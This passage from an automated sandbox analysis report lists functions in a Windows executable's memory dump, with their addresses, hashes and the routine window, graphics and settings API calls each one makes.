Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$CursorLoad$EmptyParentRect
String ID: d
API String ID: 2284761715-2564639436
Opcode ID: 4397c7917dd0734c63a8dfce236d6118f27ebf3ec7675b1dcae98262e4f61134
Instruction ID: 994e01606baf07053d07120232defdf1c4b9aa1453bd07cc2ff5c5f0f66a1ef8
Opcode Fuzzy Hash: 4397c7917dd0734c63a8dfce236d6118f27ebf3ec7675b1dcae98262e4f61134
Instruction Fuzzy Hash: E7517B71A00304AFDB15EB65DC89FAEBBF9EF48700F100569F616D72A1DB71AA00CB60

Function 00C28875 Relevance: 15.4, APIs: 10, Instructions: 369windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2887C

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

SendMessageA.USER32(?,000000B0,?,?), ref: 00C288C5
MessageBeep.USER32(000000FF), ref: 00C2893C

Part of subcall function 00CCBACD: __mbctoupper_l.LIBCMT ref: 00CCBAD7

SendMessageA.USER32(?,000000C2,00000001,00000000), ref: 00C289B6
SendMessageA.USER32(?,000000B0,?,?), ref: 00C289EC
SendMessageA.USER32(?,000000B0,?,?), ref: 00C28A57
MessageBeep.USER32(000000FF), ref: 00C28AE4
SendMessageA.USER32(?,000000C2,00000001,?), ref: 00C28BF0

Part of subcall function 00C25634: __EH_prolog3.LIBCMT ref: 00C2563B
Part of subcall function 00C25634: _memset.LIBCMT ref: 00C2566C

Part of subcall function 00BD42D2: _strnlen.LIBCMT ref: 00BD4304
Part of subcall function 00BD42D2: _memcpy_s.LIBCMT ref: 00BD4338

SendMessageA.USER32(?,000000B0,?,?), ref: 00C28C64
MessageBeep.USER32(000000FF), ref: 00C28C7A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$Send$Beep$H_prolog3$LongWindow__mbctoupper_l_memcpy_s_memset_strnlen
String ID:
API String ID: 3613179997-0
Opcode ID: 65da1b33cd3b6298ba94922eea317fbbf2266687ad0407100d898a30cc160040
Instruction ID: 3aadc58140f120609e60416e29a76cbb528015be719e351b5febe6e43272dc80
Opcode Fuzzy Hash: 65da1b33cd3b6298ba94922eea317fbbf2266687ad0407100d898a30cc160040
Instruction Fuzzy Hash: 7CD1AD70A0111AEFCF15DBA4D891EFEB7B9EF18700F100209F522A7A91DB30AE45DB61

Function 00C6E913 Relevance: 15.3, APIs: 10, Instructions: 269COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C6E94B
GetWindowRect.USER32(?,00000000), ref: 00C6E9A1
CopyRect.USER32(00000000,?), ref: 00C6E9B9
PtInRect.USER32(?,00D2C3B8,?), ref: 00C6EA90
PtInRect.USER32(?,00D2C3B8,?), ref: 00C6EABC
PtInRect.USER32(?,00D2C3B8,?), ref: 00C6EAF1
PtInRect.USER32(?,00D2C3B8,?), ref: 00C6EB19
PtInRect.USER32(?,00D2C3B8,?), ref: 00C6EB85
PtInRect.USER32(?,00D2C3B8,?), ref: 00C6EBB3
PtInRect.USER32(?,00D2C3B8,?), ref: 00C6EBF3

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$CopyParentWindow
String ID:
API String ID: 642869531-0
Opcode ID: 40d7a7d619922c9ee88692be38d33670874dcbddd368b8dc1453509067a1d9ac
Instruction ID: a638ceecccff16f23e3a1e3f8ed28f1315ec6429be5008f8b65afa8c168d392f
Opcode Fuzzy Hash: 40d7a7d619922c9ee88692be38d33670874dcbddd368b8dc1453509067a1d9ac
Instruction Fuzzy Hash: 88B1C1B5A002199FCF21CFA9C984AEEBBF5BF48740F14416AE825E7250E775AA40DF50

Function 00BD8FF3 Relevance: 15.2, APIs: 10, Instructions: 158windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00BD907A
SendMessageA.USER32(?,00000100,?,00000000), ref: 00BD9098
IsWindow.USER32(?), ref: 00BD90AF
IsWindow.USER32(?), ref: 00BD90CD
IsWindow.USER32(?), ref: 00BD9122
SendMessageA.USER32(?,0000020A,?,?), ref: 00BD9144
IsWindow.USER32(?), ref: 00BD9170
ClientToScreen.USER32(?,?), ref: 00BD917D
IsWindow.USER32(?), ref: 00BD919C
ClientToScreen.USER32(?,?), ref: 00BD91CB

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$ClientMessageScreenSend
String ID:
API String ID: 526472501-0
Opcode ID: 8b86a18c4f105078af9fc2d5bfe9003fe5d29c5d75aab1dab3965bbe6e6599d5
Instruction ID: 5e5ffe4e4e1848818243b40203342ac4524f75936bae2e73572c9c0e3ab8566a
Opcode Fuzzy Hash: 8b86a18c4f105078af9fc2d5bfe9003fe5d29c5d75aab1dab3965bbe6e6599d5
Instruction Fuzzy Hash: D6517E71600205AFDB219B64EC84B6EFBF9EB08B00F1444ABE559D6BA0F735DD41DB01

Function 00C42E5E Relevance: 15.1, APIs: 10, Instructions: 112windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(00000000), ref: 00C42E91
IsWindowVisible.USER32(00000000), ref: 00C42EA0
GetSystemMetrics.USER32(00000021), ref: 00C42ED2
GetSystemMetrics.USER32(00000021), ref: 00C42ED9
GetSystemMetrics.USER32(00000020), ref: 00C42EDF

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

IsWindowVisible.USER32(00000000), ref: 00C42F07
IsWindowVisible.USER32(00000000), ref: 00C42F16
IsZoomed.USER32(00000000), ref: 00C42F3C
GetSystemMetrics.USER32 ref: 00C42F58
GetSystemMetrics.USER32(00000004), ref: 00C42F9B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MetricsSystem$VisibleWindow$Exception@8H_prolog3ThrowZoomed
String ID:
API String ID: 1383962431-0
Opcode ID: c1a6c8fd2271b5ccdda03b1eb61a00956c68ad00e7c83e317da001cdcda5ade1
Instruction ID: 7cad1127fd64b4853b9afc8c180b9a7b5de942aac99ba235030a7f06fca61d60
Opcode Fuzzy Hash: c1a6c8fd2271b5ccdda03b1eb61a00956c68ad00e7c83e317da001cdcda5ade1
Instruction Fuzzy Hash: 9D41B0312003529FE721DBA5C98ABAA77F4FF04355F844069F9A9CB1A1D774EE40CB51

Function 00C23210 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C23217

Part of subcall function 00BD82B9: __EH_prolog3.LIBCMT ref: 00BD82C0
Part of subcall function 00BD82B9: GetDC.USER32(00000000), ref: 00BD82EC

IsRectEmpty.USER32(?), ref: 00C23232
InvertRect.USER32(?,?), ref: 00C23248
SetRectEmpty.USER32(?), ref: 00C23256
GetClientRect.USER32(?,?), ref: 00C2329D
GetSystemMetrics.USER32(00000015), ref: 00C232C4
GetSystemMetrics.USER32(00000015), ref: 00C232E8
SendMessageA.USER32(?,00001204,00000000,00000001), ref: 00C23321
SendMessageA.USER32(?,00001204,00000001,00000001), ref: 00C23343
InvertRect.USER32(?,?), ref: 00C2334B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$EmptyInvertMessageMetricsSendSystem$ClientH_prolog3H_prolog3_
String ID:
API String ID: 3401445556-0
Opcode ID: 0fbc8d83d2f96f582b6f40267e1cdebff9b285071708129d2863e2dd99cb97c5
Instruction ID: 20eecc601225e34dfa5c4b7b2808925b03bc5012d99f78623ec0c94c783c4aa8
Opcode Fuzzy Hash: 0fbc8d83d2f96f582b6f40267e1cdebff9b285071708129d2863e2dd99cb97c5
Instruction Fuzzy Hash: 19414572900268DFCF05DFA4D989AEE7BB5FF08701F050069E909BB265DB346A41CFA4

Function 00BE2A15 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00BE2A33
WindowFromPoint.USER32(?,?), ref: 00BE2A42
GetActiveWindow.USER32 ref: 00BE2A64
GetCurrentThreadId.KERNEL32 ref: 00BE2A7C
GetWindowThreadProcessId.USER32(?,00000000), ref: 00BE2A8B
GetDesktopWindow.USER32 ref: 00BE2A97

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Thread$ActiveCaptureCurrentDesktopFromPointProcess
String ID:
API String ID: 1298419125-0
Opcode ID: 40359d76161dbdf461f24cf0dcd11c003cb0bada5f60fb4765e4cca48bf4af65
Instruction ID: 7d9981d2e6e20fb015ca3d5758a84e9bdae6d73de6882b2e6eb23b20cf0fb1f1
Opcode Fuzzy Hash: 40359d76161dbdf461f24cf0dcd11c003cb0bada5f60fb4765e4cca48bf4af65
Instruction Fuzzy Hash: 89315E71900695EFCB21EFA6D8C8A6EBBF9FF48301B1400A5E406AB210DB34DD41DF51

Function 00C3EDC2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C3EDE1
IsWindow.USER32(?), ref: 00C3EDF1
MonitorFromPoint.USER32(?,?,00000002), ref: 00C3EE6D
GetMonitorInfoA.USER32(00000000), ref: 00C3EE74
CopyRect.USER32(?,?), ref: 00C3EE86
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00C3EE96
GetWindowRect.USER32(?,?), ref: 00C3EEE8

Strings

(, xrefs: 00C3EE66

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$InfoMonitorRect$CopyFromParametersPointSystem
String ID: (
API String ID: 731732153-3887548279
Opcode ID: e54f4a1838e2cb821582d59993e7a7eff3ae58cf50ebefdc5fef0ef379b08e27
Instruction ID: 7485ee34a6979f3dbae6af5a1c07b6462271b0e4c419760de264fd3c1cf9bf4f
Opcode Fuzzy Hash: e54f4a1838e2cb821582d59993e7a7eff3ae58cf50ebefdc5fef0ef379b08e27
Instruction Fuzzy Hash: 7F51407190060A9FCB14DFE5C984EAEBBF9FF88300F21455AE027D7255DB71A901DB61

Function 00BE0593 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00BE05E1
SetActiveWindow.USER32(?), ref: 00BE05F3
SendMessageA.USER32(?,00000112,?,?), ref: 00BE0609
IsWindow.USER32(?), ref: 00BE0616
SetActiveWindow.USER32(?), ref: 00BE061D
IsWindow.USER32(?), ref: 00BE0622
SetFocus.USER32(?), ref: 00BE062C

Strings

u, xrefs: 00BE0634

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 1fecea0795b5214ca367e2abec0dde9ab051cbb7db5a786cfd1476b914ad894b
Instruction ID: 0891854e1678a9b8e346346e89108c88f2caca779b6f8b5b1b6b2f149ba45bdd
Opcode Fuzzy Hash: 1fecea0795b5214ca367e2abec0dde9ab051cbb7db5a786cfd1476b914ad894b
Instruction Fuzzy Hash: A4110632920285AFDB347F36CD88B6E7AF9FB94340B0440A5F809D6161DBB4DDA0DB90

Function 00BE91D4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 00BE91FC
GetStockObject.GDI32(0000000D), ref: 00BE9204
GetObjectA.GDI32(00000000,0000003C,?), ref: 00BE9211
GetDC.USER32(00000000), ref: 00BE9220
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BE9234
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00BE9240
ReleaseDC.USER32(00000000,00000000), ref: 00BE924C

Strings

System, xrefs: 00BE91F7, 00BE9261

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: f252a46ef030ee84075a521c7bc118c111d295237ea659137ac6024fd4d43d74
Instruction ID: e825660a4746dcba6bc8cdc4cf1c8bc8ef46b6d7eeafb7ed17bea8457d600800
Opcode Fuzzy Hash: f252a46ef030ee84075a521c7bc118c111d295237ea659137ac6024fd4d43d74
Instruction Fuzzy Hash: 0E113071A00298FBEB20DBA1DC89FAE7BB8EF55741F000065FA02AB1D1DB71AD05C761

Function 00CAB5D9 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CAB5E0

Part of subcall function 00BFDA10: EnterCriticalSection.KERNEL32(00D333F0,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA4A
Part of subcall function 00BFDA10: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA5C
Part of subcall function 00BFDA10: LeaveCriticalSection.KERNEL32(00D333F0,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA69
Part of subcall function 00BFDA10: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA79

GetProfileIntA.KERNEL32(windows,DragScrollInset,0000000B), ref: 00CAB630
GetProfileIntA.KERNEL32(windows,DragScrollDelay,00000032), ref: 00CAB63F
GetProfileIntA.KERNEL32(windows,DragScrollInterval,00000032), ref: 00CAB64E

Strings

DragScrollInset, xrefs: 00CAB625
DragScrollInterval, xrefs: 00CAB643
windows, xrefs: 00CAB62A, 00CAB62F, 00CAB639, 00CAB648
DragScrollDelay, xrefs: 00CAB634

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$windows
API String ID: 4229786687-1024936294
Opcode ID: 3ee1e7c1862f2000ccfcf509bdecc6263e9e4f01a20a19f4ef12e49ee7ed1f6d
Instruction ID: abe6ae8ee70f557b766fe02f1175fad0dc5fb7c082497cd47f73ca96f98c8c7d
Opcode Fuzzy Hash: 3ee1e7c1862f2000ccfcf509bdecc6263e9e4f01a20a19f4ef12e49ee7ed1f6d
Instruction Fuzzy Hash: 2B0162F0641744AAD721EF669D42B09BAE8BF98B40F80051AF248EB3D1C7F49514CF29

Function 00C28C97 Relevance: 13.9, APIs: 9, Instructions: 357windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C28C9E
SendMessageA.USER32(?,000000B0,?,?), ref: 00C28CB6
MessageBeep.USER32(000000FF), ref: 00C28D59
MessageBeep.USER32(000000FF), ref: 00C290A5

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$Beep$H_prolog3Send
String ID:
API String ID: 491126482-0
Opcode ID: 3d763e0da68558e2c623d3147f3d3b963609247d317edf1572ada6095b183d39
Instruction ID: 5d400b5123078b0c42973b21376ad573361f0b84637ba57c38891e8d34253776
Opcode Fuzzy Hash: 3d763e0da68558e2c623d3147f3d3b963609247d317edf1572ada6095b183d39
Instruction Fuzzy Hash: 52D1CF3190116A9FCF11DBA4D885FFEFBB6EF58700F200159E251B7A91DB306A49CBA1

Function 00C290C2 Relevance: 13.8, APIs: 9, Instructions: 348windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C290C9
SendMessageA.USER32(?,000000B0,?,?), ref: 00C290E7
SendMessageA.USER32(?,000000B0,?,?), ref: 00C290F5
MessageBeep.USER32(000000FF), ref: 00C29161
SendMessageA.USER32(?,000000B0,?,?), ref: 00C29303
MessageBeep.USER32(000000FF), ref: 00C29396
SendMessageA.USER32(?,000000C2,00000001,?), ref: 00C29449
SendMessageA.USER32(?,000000B0,?,?), ref: 00C294AB
MessageBeep.USER32(000000FF), ref: 00C294C1

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$Send$Beep$H_prolog3
String ID:
API String ID: 204075910-0
Opcode ID: 3d4545d57b4ecc420f069c9842982f43a5daf9164e8411ea23676cf1dc8738ff
Instruction ID: 3a59b283f70c59913915e244ce59fa2968fa021ce5a96044ee680d9ab7dc01c2
Opcode Fuzzy Hash: 3d4545d57b4ecc420f069c9842982f43a5daf9164e8411ea23676cf1dc8738ff
Instruction Fuzzy Hash: DFD1BC3190426AAFCF12DBA5D884EEEFBBAFF48300F244159F151B7691DB34A941CB61

Function 00C1942B Relevance: 13.8, APIs: 9, Instructions: 286keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 00C19449
GetWindowRect.USER32(?,?), ref: 00C194B1
GetCursorPos.USER32(?), ref: 00C194FB

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CursorRectStateWindow
String ID:
API String ID: 3412758350-0
Opcode ID: 69d5e3e07c95126e13a5fb64d6348a13b35971dc34eede4f0d1ad9ef732a7664
Instruction ID: 6e468895b488f7e1d6c1d8c125689f4b64afc584f042b5c4b276c5a327a4521c
Opcode Fuzzy Hash: 69d5e3e07c95126e13a5fb64d6348a13b35971dc34eede4f0d1ad9ef732a7664
Instruction Fuzzy Hash: 8CB12874A10209AFCF10EFA5D894AEEBBF5EF4A314F14446EE456A7241DB309980EF61

Function 00C054F7 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C05501
GetWindowRect.USER32(?,?), ref: 00C05550
OffsetRect.USER32(?,?,?), ref: 00C05566

Part of subcall function 00BD82B9: __EH_prolog3.LIBCMT ref: 00BD82C0
Part of subcall function 00BD82B9: GetDC.USER32(00000000), ref: 00BD82EC

CreateCompatibleDC.GDI32(?), ref: 00C055D7
SelectObject.GDI32(?,?), ref: 00C055F7
SelectObject.GDI32(?,?), ref: 00C05639
CreateCompatibleDC.GDI32(?), ref: 00C05752
SelectObject.GDI32(?,?), ref: 00C05772
SelectObject.GDI32(?,00000000), ref: 00C057A2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateRect$H_prolog3H_prolog3_OffsetWindow
String ID:
API String ID: 2818906880-0
Opcode ID: f4aa885d78e6ccb1e42da38d8e9ec33ae4f192013acbcd785da96765a9fd4b45
Instruction ID: 7028a7b5f9a3c3b0b3c0f717bf24a6d94f3d01a08db817545d5d3acbbe25dc38
Opcode Fuzzy Hash: f4aa885d78e6ccb1e42da38d8e9ec33ae4f192013acbcd785da96765a9fd4b45
Instruction Fuzzy Hash: F4A1F571D00219EFCF15EFA4C985AEEBBB5BF08300F1041AAE915B7291EB316A45DF61

Function 00BD6AA7 Relevance: 13.7, APIs: 9, Instructions: 233filecomstringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BD6AAE
OleDuplicateData.OLE32(?,?,00000000), ref: 00BD6B2F
GlobalLock.KERNEL32(00000000), ref: 00BD6B5E
CopyMetaFileA.GDI32(?,00000000), ref: 00BD6B6A
GlobalUnlock.KERNEL32(?), ref: 00BD6B7A
GlobalFree.KERNEL32(?), ref: 00BD6B83
GlobalUnlock.KERNEL32(?), ref: 00BD6B8F

Part of subcall function 00BD6A63: __EH_prolog3.LIBCMT ref: 00BD6A6A

lstrlenW.KERNEL32(?,0000005C,00CA633E,?,?,?), ref: 00BD6BEF
CopyFileA.KERNEL32(?,?,00000000), ref: 00BD6CE7

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

